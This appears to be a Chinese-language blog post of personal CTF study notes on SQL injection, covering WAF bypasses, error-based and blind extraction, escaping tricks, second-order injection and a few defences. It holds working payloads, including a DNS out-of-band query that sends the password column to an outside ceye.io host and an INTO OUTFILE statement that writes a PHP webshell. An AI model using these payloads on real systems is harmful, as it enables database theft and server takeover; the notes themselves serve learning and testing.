<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"http://xxx/xxx.php"</span> <span class="attr">method</span>=<span class="string">"POST"</span> <span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span>&gt;</span>    </div><div class="line">    file:<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"username"</span> / &gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span>          </div><div class="line">    username:<span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>=<span class="string">"username"</span> <span class="attr">value</span>=<span class="string">"payload"</span> <span class="attr">style</span>=<span class="string">"width:250px;"</span> / &gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span>           </div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"attack"</span> /&gt;</span>      </div><div class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></div></pre></td></tr></table></figure>
</li>
<li><p>我们把这个参数写的很长，比如经典的’ or xxx，我们在单引号之前填充很多的数据来耗尽waf的缓冲区，or后面的部分就不会被检测到了 ，比如aaa*1000’ or xxx</p>
</li>
</ul>
<p><strong>其他</strong></p>
<ul>
<li><p>过滤了union select from 却没有对单个关键字进行过滤。还是使用变量的方法，将数据存到变量里面，之后再用union select查询，这样就不会与from连起来了</p>
<p><code>select 1 from user where 2=3|@c:=(select flag from flag) union select @c;</code>这样最后就没有from了</p>
</li>
</ul>
<h2 id="报错注入得到表名列名以及不使用列名下的注入"><a href="#报错注入得到表名列名以及不使用列名下的注入" class="headerlink" title="报错注入得到表名列名以及不使用列名下的注入"></a>报错注入得到表名列名以及不使用列名下的注入</h2><p>如果information_schema，column_name，table_name，所有的表名或多或少的被过滤了，同时存在着报错注入的情况下，我们还是可以想办法通过报错注入拿到表名，列名以及一些数据的</p>
<h4 id="首先是拿到数据库名"><a href="#首先是拿到数据库名" class="headerlink" title="首先是拿到数据库名"></a>首先是拿到数据库名</h4><p>数据库名很好拿，只要我们在sql查询中使用一个库中并不存在的函数，就会爆出库名</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select * from user where username='' and c();</div><div class="line">ERROR 1305 (42000): FUNCTION blog.c does not exist</div></pre></td></tr></table></figure>
<p>实际上数据库名并不是必须要拿的，主要是只能拿当前库的名字，而写sql的时候又没必要加上当前库的名字。。。</p>
<p>在后面可以看到，拿表名列名什么的时候，也都可以顺便把数据库名爆出来</p>
<h4 id="然后是拿表名"><a href="#然后是拿表名" class="headerlink" title="然后是拿表名"></a>然后是拿表名</h4><p>注意，拿表名需要至少猜测到一个表中存在的字段名</p>
<p>在测试基于主键的报错时无意中发现了这么一个报错</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select * from user group by 1 and 1;</div><div class="line">ERROR 1055 (42000): Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'blog.user.username' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by</div></pre></td></tr></table></figure>
<p>有趣的是这里将数据库名，表名，表中的第一个字段名都爆了出来。这一点会对我们接下来的工作有帮助。</p>
<p>看到网上通用的做法是利用函数Polygon的报错实现</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select * from user where username=Polygon(username);</div><div class="line">ERROR 1367 (22007): Illegal non geometric '`blog`.`user`.`username`' value found during parsing</div></pre></td></tr></table></figure>
<p>原理其实就是将字段名作为报错函数的参数，这样在报错时可能就会将字段的详细信息爆出来，所以之前介绍的那些报错函数大都是可用的</p>
<ul>
<li><p>exp()</p>
</li>
<li><p>geometrycollection()</p>
</li>
<li>multipoint()</li>
<li>polygon()</li>
<li>multipolygon()</li>
<li>linestring() </li>
<li>multilinestring() </li>
</ul>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select * from user where username=exp(~username);</div><div class="line">ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~(`blog`.`user`.`username`))'</div></pre></td></tr></table></figure>
<h4 id="其实到这一步我们就可以直接拿数据了，有下面几种姿势可以在不使用列名的情况下拿到表里的数据"><a href="#其实到这一步我们就可以直接拿数据了，有下面几种姿势可以在不使用列名的情况下拿到表里的数据" class="headerlink" title="其实到这一步我们就可以直接拿数据了，有下面几种姿势可以在不使用列名的情况下拿到表里的数据"></a>其实到这一步我们就可以直接拿数据了，有下面几种姿势可以在不使用列名的情况下拿到表里的数据</h4><p>思路一：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,(<span class="keyword">select</span> e<span class="number">.2</span> <span class="keyword">from</span> (<span class="keyword">select</span> * <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>)a,(<span class="keyword">select</span> <span class="number">2</span>)b,(<span class="keyword">select</span> <span class="number">3</span>)c,(<span class="keyword">select</span> <span class="number">4</span>)d <span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span> )e);</div><div class="line"></div><div class="line">其实目的就是通过这种写法来不用写段名拿到数据：</div><div class="line"><span class="keyword">select</span> e<span class="number">.1</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span> <span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span>)e</div><div class="line"></div><div class="line">格式化展示：</div><div class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,</div><div class="line">	(<span class="keyword">select</span> e<span class="number">.2</span> <span class="keyword">from</span> (<span class="keyword">select</span> * <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>)a,(<span class="keyword">select</span> <span class="number">2</span>)b,(<span class="keyword">select</span> <span class="number">3</span>)c,(<span class="keyword">select</span> <span class="number">4</span>)d <span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)e);</div></pre></td></tr></table></figure>
<p><strong>解释</strong><br>因为不能使用列名，所以通过语句<code>select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d</code>来建立一个形如<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">+<span class="comment">------------------+----------------------------------+---------------------+-------+</span></div><div class="line">| 1                | 2                                | 3                   | 4     |</div><div class="line">+<span class="comment">------------------+----------------------------------+---------------------+-------+</span></div><div class="line">| 1                | 2                                | 3                   | 4     |</div><div class="line">+<span class="comment">------------------+----------------------------------+---------------------+-------+</span></div></pre></td></tr></table></figure></p>
<p>这样的表，我们使用别名叫e，如果再链接上我们要操作的表，就是这样</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;</div><div class="line">+------------------+----------------------------------+---------------------+-------+</div><div class="line">| 1                | 2                                | 3                   | 4     |</div><div class="line">+------------------+----------------------------------+---------------------+-------+</div><div class="line">| 1                | 2                                | 3                   | 4     |</div><div class="line">| SometimesSomeone | dd9d15d993d6f42f896ab4ba09a6a695 | 13512279197@163.com | user  |</div><div class="line">| 11               | 56057a4f4e475d73e48824acf8b54098 | 123@12              | user  |</div><div class="line">| admin            | 6b9412ec641f16892544154952fc8b1d | 13512279197@163.com | admin |</div><div class="line">+------------------+----------------------------------+---------------------+-------+</div></pre></td></tr></table></figure>
<p>所以现在其实列名就已经换成了1，2，3，4来表示了，之后我们就能拿到要的数据了</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select e.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user limit 1,1 )e;</div><div class="line">+----------------------------------+</div><div class="line">| 2                                |</div><div class="line">+----------------------------------+</div><div class="line">| dd9d15d993d6f42f896ab4ba09a6a695 |</div><div class="line">+----------------------------------+</div></pre></td></tr></table></figure>
<p>思路二：</p>
<p>看了猫哥的wp后又学到了一种姿势，同样可以不用列名就能拿到wp，只是需要盲注</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">where user='admin' union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">3</span> <span class="keyword">desc</span>;</div></pre></td></tr></table></figure>
<p>思路三：</p>
<p>还能想到LuckGame题目中的做法，就是在没有过滤的点将数据都拿出来存到变量里面，之后直接查变量就好</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"> <span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> username=<span class="string">'admin'</span> <span class="keyword">into</span> @a,@b,@c,@d;</div><div class="line">之后读取@a @b @c @d 这四个变量就可以了</div></pre></td></tr></table></figure>
<h4 id="最后再介绍下拿列名的做法"><a href="#最后再介绍下拿列名的做法" class="headerlink" title="最后再介绍下拿列名的做法"></a>最后再介绍下拿列名的做法</h4><p>出自orange的文章，原理：</p>
<p>将两个相同的表使用join操作连接到一起<code>select * from user as a join user as b</code>，然后生成的表中就有了相同的列，其实只是列名相同，但他们分别隶属于不同的表的，之后为此表赋予别名，<code>select * from (表) as e</code>，然后就会触发相同列名的错误，因为别名表中是不能有相同的列的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">select * from user where username=&apos;&apos; and</div><div class="line"> (select * from </div><div class="line">	(select * from user as a join user as b [开始为空之后逐个为using(爆出的column)])</div><div class="line">  as e);</div><div class="line">output: ERROR 1060 (42S21): Duplicate column name &apos;password&apos;</div></pre></td></tr></table></figure>
<h2 id="使用Out-of-Band带外攻击来回显数据"><a href="#使用Out-of-Band带外攻击来回显数据" class="headerlink" title="使用Out of Band带外攻击来回显数据"></a>使用Out of Band带外攻击来回显数据</h2><p>在mysql中参数select @@secure_file_priv为空的情况下(事实上并不多见，现在要么置为了固定的tmp文件夹，要么直接为NULL表示禁用文件存取相关操作)，文件操作是支持使用url的，在函数load_file()中可以通过DNS查询来将数据携带出来。</p>
<p>payload: <code>SELECT LOAD_FILE(CONCAT(&#39;\\\\&#39;,(SELECT password FROM user),&#39;.a.wslhlk.ceye.io\\abc&#39;));</code></p>
<p>在测试中可以看到，因为DNS缓存的原因，相同的域名不会第二次查询，所以建议每次更改a的值</p>
<p>另外注意域名中只支持英文字母，数字，-，且-不能用作开头和结尾，且长度限制在了63，所以比较适合用于携带hash后的密码这些数据</p>
<h2 id="只能拿当前表内的数据的情况分析"><a href="#只能拿当前表内的数据的情况分析" class="headerlink" title="只能拿当前表内的数据的情况分析"></a>只能拿当前表内的数据的情况分析</h2><p>有时候因为过滤比较严格，或是所要的数据就在本表内，我们使用的策略往往只能在当前表内查数据</p>
<p>这种过滤往往是这样的：</p>
<blockquote>
<p>限制了select  或者 from，其实就从根本上限制了读取其他表的数据，除非有绕过的方法</p>
</blockquote>
<p>虽然不能读取其他的表，我们可能还是有办法读取本表的数据的，下面是几个例子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">select * from user where username=&apos;&apos;  参数禁止使用select</div><div class="line"></div><div class="line">策略一：   ————————经典的like注入</div><div class="line">select * from user where username=&apos;admin&apos; or binary password like &apos;xx%&apos;</div><div class="line">可以用来拿到username为admin的密码</div><div class="line">select * from user where username=&apos;xxx&apos; or 1 and binary password like &apos;flag&#123;%&apos;</div><div class="line">常对一个字段进行寻找，最后输出为username=&apos;xxx&apos;行,以及password like &apos;flag&#123;%&apos;行</div><div class="line"></div><div class="line">策略二：</div><div class="line">select * from user where username=&apos;admin&apos; or substr(password,1,2)=&apos;xx&apos;</div><div class="line"></div><div class="line">策略三：</div><div class="line">select password from user where user=&apos;admin&apos; union select [&apos;a&apos;|&apos;fe&apos;] order by 1;</div><div class="line">经典的order by比较注入，不能使用from，or and也被禁用时</div></pre></td></tr></table></figure>
<p>补充（for myself）:</p>
<p>基本上注入点都是where这里，需要注意到有这两种类型，他们做出的反馈也是不一样的</p>
<ol>
<li><p>select * from user where 1 or 1/0</p>
<p>这种where下是要么全选中，要么全不选</p>
</li>
<li><p>select * from user where password like ‘N1%’</p>
<p>这种where下是要么不选中，要么只选中一条</p>
</li>
</ol>
<p>在构造注入的时候，这两种where希望别搞混了</p>
<h2 id="单引号转义下的注入思路整理"><a href="#单引号转义下的注入思路整理" class="headerlink" title="单引号转义下的注入思路整理"></a>单引号转义下的注入思路整理</h2><p>讲道理在单引号被转义而无法使用下，就基本GG了，但在一些特殊的配置下仍可能实现注入，在做题时也偶尔会碰到这些有意思的场景，把历来的思路做个记录。</p>
<ul>
<li><p>宽字节注入<code>%df%2f</code>，通过%df来吃掉\组成一个字符</p>
</li>
<li><p>存在切割操作，从对转义后的字符串中切割出一个<strong>真正的<code>\</code></strong>，使用这个反斜杠来转义最后一个单引号，适用于两个可控注入点的情况<code>select * from user where id=&#39;$_GET[&#39;id&#39;] and username=&#39;$_GET[&#39;username&#39;]&#39;</code>，在后一个可控点进行注入</p>
</li>
<li><p>只转义了单引号，可以通过添加一个\来转义转义单引号的反斜杠，将单引号解放出来</p>
</li>
<li><p>像国赛里的一道题目样自己作死，在转义后又将单引号去掉，导致又出现了和第二条一样的一个<strong>真正的<code>\</code></strong>，然后与第二条同样的用法</p>
</li>
<li><p>转义可能仍有疏漏，比如对get,post转义，但参数用的request[‘id’]，这个是没有转义的</p>
</li>
<li><p>也许只是虚晃一枪呢？的确转义的天衣无缝，但我们找到了一个数值型的注入点，并不需要单引号:)</p>
</li>
<li><p>利用二次注入中数据库存储的最大长度实现截断出一个反斜杠。考虑这样一种情况，二次注入点并没有过滤，但是实际存储中进行了两次转义存储，所以数据库中存的<code>\&#39;</code>，导致二次注入仍然无法利用。我们可以寻找一个二次注入语句有两个参数的点，通过数据库中存储的最大长度实现截断出来一个真正的<code>\</code>，实现引号闭合然后供第二个参数去注入</p>
</li>
<li><p>连续两次sprintf调用来实现sql语句的拼接，在第一个位置使用<code>%&#39;</code>，转义后为<code>%\&#39;</code>，在第二次拼接中，<code>%</code>将吃掉<code>\</code>字符，导致单引号逃逸。为了保证格式化参数个数正确，使用<code>%1$&#39;</code>即可。原理参见<a href="https://paper.seebug.org/386/" target="_blank" rel="external">https://paper.seebug.org/386/</a>里面还有一些其他的利用方法</p>
<p>​</p>
</li>
</ul>
<h2 id="非常规的注入做法"><a href="#非常规的注入做法" class="headerlink" title="非常规的注入做法"></a>非常规的注入做法</h2><p>其实有一些实际情况中，会做出各种各样的有趣限制，可能就导致虽然注入点存在，但并不能靠以往的流程来走了，这些场景处理起来比较有趣，有时也需要一些奇思妙想，故打算整理一下</p>
<h4 id="场景一"><a href="#场景一" class="headerlink" title="场景一"></a>场景一</h4><p>可以使用union，限制了from所以最多只能从本表中拿数据，限制了比较函数截取函数所以无法做字符串截取比较。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">user</span>=<span class="string">'admin'</span> <span class="keyword">union</span> <span class="keyword">select</span> [<span class="string">'a'</span>|<span class="string">'fe'</span>] <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">1</span>;</div></pre></td></tr></table></figure>
<p>通过额外的一行来与要拿的一行进行排序比较，测试出哪一行的值。注意因为对大小写不敏感，所以测试的字符中只包括一套大写字母或小写字母就够了，另外盲注出的结果也无法区分大小写</p>
<h4 id="场景二"><a href="#场景二" class="headerlink" title="场景二"></a>场景二</h4><p>来自于RCTF的login题目，大致情况猜测如下：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">select password from users where username='$_GET["username"]';</div><div class="line">if($password === $_GET['password'])&#123;</div><div class="line">  login successful;</div><div class="line">&#125;</div><div class="line">已知存在账户：username=p password=p</div><div class="line">限制了username的长度为最多36个字符</div></pre></td></tr></table></figure>
<p>姿势：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">p'||substr(username,1,1)='a  测试有没有存在用户名为a ad adm admi</div><div class="line"><span class="keyword">select</span> <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> username=<span class="string">'p'</span>||<span class="keyword">substr</span>(username,<span class="number">1</span>,<span class="number">1</span>)=<span class="string">'a'</span>;</div><div class="line"></div><div class="line">其实通过上面的姿势已经可以拿到这个表中的所有数据了：</div><div class="line">p'||substr(password,1,10)='justatestb</div><div class="line">就是在测试表中存在的password密码字段的第十位是b还是其他的</div><div class="line"></div><div class="line">这里有几个问题：</div><div class="line">一是为了保证区分大小写，需要修改payload如下：</div><div class="line">p'||substr(hex(password),1,4)='3131</div><div class="line">二是因为username长度限制为36个字符，所以肯定不能测试有没有a，有没有ad，</div><div class="line">有没有adm这样的做，需要改成这样的方式：测试有没有ad，测试有没有dm，</div><div class="line">测试有没有mi。。这样做可以保证每次测试的password都是我们想要的那一行</div><div class="line">而不是测试有没有i，测试有没有n这种可能会受到其他入12i34影响的。</div></pre></td></tr></table></figure>
<h4 id="场景三"><a href="#场景三" class="headerlink" title="场景三"></a>场景三</h4><p>来自于HCTF的SQLSilencer的显注姿势，情况如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">waf正则为</div><div class="line">/union([\s\S]+)select([\s\S]+)from/i</div><div class="line">也就是限制了union select password from username 这种书写形式</div></pre></td></tr></table></figure>
<p>显注姿势：</p>
<p>讲道理应该还有其他的姿势，但是很喜欢出题人的payload——利用变量来做</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">类似于以下形式：</div><div class="line"><span class="keyword">set</span> c = (<span class="keyword">select</span> <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> username=<span class="string">'admin'</span>);</div><div class="line">where id=1 union <span class="keyword">select</span> @c;</div><div class="line"></div><div class="line">集成在一句话中就是：</div><div class="line">where id=1|@c:=(payload) union <span class="keyword">select</span> @c;</div></pre></td></tr></table></figure>
<h4 id="场景四"><a href="#场景四" class="headerlink" title="场景四"></a>场景四</h4><p>来自于SECCON sqlsrf题目的sql部分</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">题目和场景二很相似</div><div class="line">select password from users where username='$_GET["username"]';</div><div class="line">if($password === $_GET['password'])&#123;</div><div class="line">  login successful;</div><div class="line">&#125;</div><div class="line">这里取消了对username的字符长度限制，相应的禁用了字符串截取函数（其实</div><div class="line">只是SQLite没有这些函数2333），另外不同的是，知道username存在admin账户，</div><div class="line">但未知密码，请尝试用盲注得到admin的密码</div></pre></td></tr></table></figure>
<p>姿势</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">admin' and password like 'xx%' and randomblob(3000000000) and ''='</div><div class="line"><span class="keyword">select</span> <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> username=<span class="string">'admin'</span> <span class="keyword">and</span> <span class="keyword">password</span> <span class="keyword">like</span> <span class="string">'xx%'</span> <span class="keyword">and</span> randomblob(<span class="number">3000000000</span>) <span class="keyword">and</span> <span class="string">''</span>=<span class="string">''</span>;</div><div class="line"></div><div class="line">payload里没有走之前盲注的流程，因为目的很明确，只是为了拿到当前表中</div><div class="line">admin账户的密码。根据第二个bool运算是否成立的来触发后面的time盲注</div></pre></td></tr></table></figure>
<h4 id="场景五"><a href="#场景五" class="headerlink" title="场景五"></a>场景五</h4><p>来自于N1CTF里的两道sql题目</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">考察<span class="keyword">update</span>注入</div><div class="line"><span class="keyword">update</span> <span class="keyword">users</span> <span class="keyword">set</span> points=%s</div></pre></td></tr></table></figure>
<p>姿势</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">因为是<span class="keyword">update</span>注入，直接将是否成功更改了points作为bool标志即可</div><div class="line"><span class="number">1.</span> <span class="keyword">update</span> <span class="keyword">users</span> <span class="keyword">set</span> points=<span class="number">1</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> <span class="number">0</span> <span class="keyword">or</span> <span class="number">1</span>/<span class="number">0</span></div><div class="line">来限制<span class="keyword">update</span>更新所有行还是一行都不更新</div><div class="line"><span class="number">2.</span> <span class="keyword">update</span> <span class="keyword">users</span> <span class="keyword">set</span> points=<span class="number">1</span> <span class="keyword">where</span> <span class="keyword">password</span> <span class="keyword">like</span> <span class="string">'N____________'</span></div><div class="line">经典的使用<span class="keyword">like</span>注入来逐位获取</div><div class="line"><span class="number">3.</span> <span class="keyword">update</span> <span class="keyword">users</span> <span class="keyword">set</span> points=<span class="number">1</span> <span class="keyword">where</span> <span class="keyword">substr</span>(<span class="keyword">password</span>,<span class="number">1</span>,<span class="number">1</span>)=<span class="string">'N'</span></div><div class="line">使用<span class="keyword">substr</span>来逐位获取</div><div class="line"><span class="number">4.</span> <span class="keyword">update</span> <span class="keyword">users</span> <span class="keyword">set</span> points=<span class="number">1111111</span>*<span class="keyword">if</span>(<span class="number">0</span>/<span class="number">1</span>, <span class="number">1</span>,<span class="number">11111111111</span>)</div><div class="line">通过乘法的运算溢出来构造报错注入</div></pre></td></tr></table></figure>
<h2 id="关于二次注入"><a href="#关于二次注入" class="headerlink" title="关于二次注入"></a>关于二次注入</h2><p>采用mysqli_escape_string(),addslashes()这种转义型的过滤，如果没有其他额外人为操作的话，在这个sql点就是安全，那仍然会保留’这种脏数据，所以要留意会不会在其他sql点造成二次注入</p>
<p>在qwb中注意到了一个很有意思的点，大致是这样的：</p>
<ul>
<li>表中age参数为char类型，但期望存储的是数值型</li>
<li>在存储中，使用的是insert users(age) values(123)的做法，传入的是个数字，通过mysql的类型转换将数值型转换为字符型存储起来</li>
</ul>
<p>那么可能出现的问题如下图所示：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div></pre></td><td class="code"><pre><div class="line">mysql&gt; create table test1(</div><div class="line">    -&gt; age varchar(100)</div><div class="line">    -&gt; );</div><div class="line">Query OK, 0 rows affected (0.01 sec)</div><div class="line"></div><div class="line">mysql&gt; insert test1 values(123);</div><div class="line">Query OK, 1 row affected (0.00 sec)</div><div class="line"></div><div class="line">mysql&gt; insert test1 values(0x31);</div><div class="line">Query OK, 1 row affected (0.00 sec)</div><div class="line"></div><div class="line">mysql&gt; insert test1 values(0x3127206f7220312d2d20);</div><div class="line">Query OK, 1 row affected (0.00 sec)</div><div class="line"></div><div class="line">mysql&gt; select * from test1;</div><div class="line">+------------+</div><div class="line">| age        |</div><div class="line">+------------+</div><div class="line">| 123        |</div><div class="line">| 1          |</div><div class="line">| 1' or 1--  |</div><div class="line">+------------+</div></pre></td></tr></table></figure>
<p>可以看到成功插入了脏数据，在二次查询的时候如果没有做好防护就会产生二次注入</p>
<p>相应这里可以采取的防护措施如下：</p>
<ul>
<li>既然age列是存储数值型的，数据库中就使用相应的数值型如int，long来存储</li>
<li>既然将age列用了字符存储，在插入的时候就使用单引号括起来，否则mysql就会做类型转换</li>
</ul>
<h2 id="一些零碎记录的点"><a href="#一些零碎记录的点" class="headerlink" title="一些零碎记录的点"></a>一些零碎记录的点</h2><ol>
<li><p>针对sql注入做的waf防护，常见的有以下几种</p>
<ul>
<li>采用mysqli_escape_string(),addslashes()这种转义型的过滤，如果没有其他额外人为操作的话，在这个sql点就是安全，那仍然会保留’这种脏数据，所以要留意会不会在其他sql点造成二次注入</li>
<li>自己写filter函数，对某些关键字啊，空格啊，符号啊禁用，也是常常产生绕过的地方，比如双写绕过啊，使用其他相同意义的函数啊，空格用%0a代替啊这些。一些比较奇葩的过滤规则可能会引入威胁，就比如国赛帽子的那道题目</li>
<li>waf函数，如果检测到敏感字符会die掉进程，也是经常进行绕过的地方</li>
<li>使用PDO结构的sql对象，进行-&gt;perpare预处理之后，那参数就是参数，语句就是语句，基本很难形成注入</li>
</ul>
</li>
<li><p>除了针对各种sql点上过滤的绕过，还有几种情况是值得考虑的</p>
<ul>
<li>如果参数其实并没有被过滤呢？就像TCTF上那道题目，全局参数过滤了GET POST ,然而一个参数点使用的是REQUEST[‘username’]来获得的参数，那其实这注入点的参数并没有被过滤</li>
<li>有些注入点的参数并不是自定义的，但有可能其最终来源还是用户自定义的，而且来源收录的时候只是进行了转义，记录的数据仍然为脏数据，这样这些存储值不经过滤的传到其他注入点做参数就会构成二次注入。（个人感觉二次注入在黑盒审计中出现的场景比代码审计要多，而且经常出现在用户名注册，之后一些操作直接提取用户名去进行sql操作）</li>
</ul>
</li>
<li><p>TCTF里有一道很有意思的注入题目，是关于列名这个参数点注入的，那个题目使用CI框架写的，在$this-&gt;db-&gt;select()-&gt;from()-&gt;where()的select()这个函数里面装的是列名，这个参数在题目中可以由我们自定义，当然做了很多过滤，同时CI框架本身也做了很多过滤，wupco师傅对其进行了仔细分析<a href="http://www.wupco.cn/?p=3646" title="http://www.wupco.cn/?p=3646" target="_blank" rel="external">http://www.wupco.cn/?p=3646</a>，小m师傅当时用了xdebug对运行代码进行了调试，可能也是为了搞清楚CI框架内部做了什么过滤，发现后面加一对’’就没有过滤了。具体的过滤分析找时间再细看，这次先学习下列名注入<br><code>select column_name from test</code>,在column_name可控制下，我们这样写<br><code>select {table_name from information_schema.tables where table_schema=&#39;blog&#39; union select 1} from test</code>这样就可以构造注入了</p>
</li>
<li><p>在数据库的登陆用户为root时，有可能是可以在任意目录下写文件的，这样我们就可以写一个webshell出来了<br><code>union select &quot;&lt;?php system($_GET[‘c’]);?&gt;&quot; into outfile &#39;/var/www/html/uploads/shell.php&#39;</code><br>实际情况测试的时候，在wamp中发现报错：<code>The MySQL server is running with the --secure-file-priv option so it cannot execute this statement</code>，在sql.ini下将secure-file-priv注释掉就好了<br>在kali的mysql中测试时发现，文件是可以写的，但尝试在/var/www/html/中写文件的时候，显示没有权限，就算是改用root账户登陆也不行，这时其实就是目标文件夹的权限配置问题了，一般网页根目录下的upload/文件是可以写文件进去的。当然前提还得是mysql以root登陆才能有写文件的权限</p>
</li>
<li><p>基于语义的waf学习（先占坑有时间加上去）</p>
</li>
<li><p>这一条留给自己看，尝试考虑下拿到一个sql点的时候手注的顺序，因为感觉很多sql点加一点过滤就会在测试的时候各种懵逼，还是找个比较好的测试顺序比较好</p>
